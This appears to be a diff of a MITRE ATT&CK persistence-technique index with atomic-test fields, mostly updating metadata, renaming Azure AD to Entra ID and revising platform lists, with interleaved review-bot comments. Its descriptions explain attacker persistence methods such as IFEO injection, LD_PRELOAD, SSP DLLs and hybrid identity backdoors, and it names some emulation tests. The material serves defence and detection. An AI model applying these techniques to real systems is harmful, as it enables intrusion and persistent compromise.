+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
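Review bot: the newly added T1098.007 entry ends at `atomic_tests: []` without an `identifier: T1098.007` line under `technique:`, whereas entries such as T1137.006, T1556.002 and T1505.005 in this same file carry `identifier: <technique id>` immediately before `atomic_tests:`. Some existing entries (T1574.014, T1053, T1137.005) already lack it, so if consumers key on the map name this is harmless, but the generator should then emit the field consistently one way or the other rather than per entry.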
@@ -35716,7 +36150,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -35771,13 +36205,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -35838,9 +36270,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -35849,7 +36281,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -35902,7 +36333,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -35923,12 +36354,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -36012,11 +36442,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -36029,7 +36458,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -36042,7 +36470,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -36072,7 +36499,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
@@ -36104,7 +36532,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -36126,8 +36554,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -36153,7 +36579,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -36179,36 +36605,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
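Review bot: the Azure AD to Entra ID wording change correctly leaves the citation keys such as `(Citation: Azure AD Hybrid Identity)` and `(Citation: Azure AD Connect for Read Teamers)` and the literal service name `AzureADConnectAuthenticationAgentService` untouched; the citation keys must keep matching the `source_name` entries in `external_references` and the service name is the real Windows service, so make sure no later search-and-replace pass over "Azure AD" renames them.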
@@ -36216,9 +36640,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -36227,21 +36651,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
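Review bot: replacing `Azure AD`, `Google Workspace` and `Office 365` with `Office Suite` and `Identity Provider` in `x_mitre_platforms` (with the version bump to 1.1) changes which per-platform views list T1556.007; any index or filter that still keys on the old platform names will silently drop this technique, so the platform-specific indexes should be regenerated in the same change. The same rename is applied to T1078.001 and T1098.005 further down; keep the platform vocabulary consistent across all three.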
@@ -36281,13 +36706,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -36364,12 +36786,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -36388,6 +36809,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -36395,7 +36817,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -36415,29 +36836,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
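Review bot: the `Microsoft CreateProcess` and `Microsoft WinExec` references move from msdn.microsoft.com to learn.microsoft.com with the retrieval date updated to September 12, 2024, but `Microsoft Environment Property` and `Windows NT Command Shell` keep `docs.microsoft.com/en-us/previous-versions/` URLs with 2016 and 2014 retrieval dates; if the aim is to refresh stale links, those two should be checked as well. The reorder of `external_references` and the move of `x_mitre_modified_by_ref` to the end of the block (removed in the previous hunk, re-added here) account for most of the churn; a stable key order in the generator would keep these diffs reviewable.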
@@ -36514,12 +36937,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -36534,6 +36956,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -36542,18 +36965,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -36585,9 +37008,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -36659,7 +37079,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -36686,7 +37105,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -36712,8 +37131,6 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests:
- name: Trap EXIT
@@ -36804,7 +37221,7 @@ persistence:
name: sh
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -36925,7 +37342,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -37072,7 +37488,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests:
- name: Create a user account on a Linux system
@@ -37236,7 +37651,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -37346,7 +37760,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests:
- name: Modify SSH Authorized Keys
@@ -37419,7 +37832,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -37452,8 +37865,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -37484,7 +37895,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -37519,12 +37930,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -37601,7 +38010,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -37655,7 +38063,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests:
- name: Active Directory Create Admin Account
@@ -37796,7 +38203,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -37826,55 +38233,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
@@ -37905,6 +38267,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -37914,9 +38277,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -37924,11 +38291,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
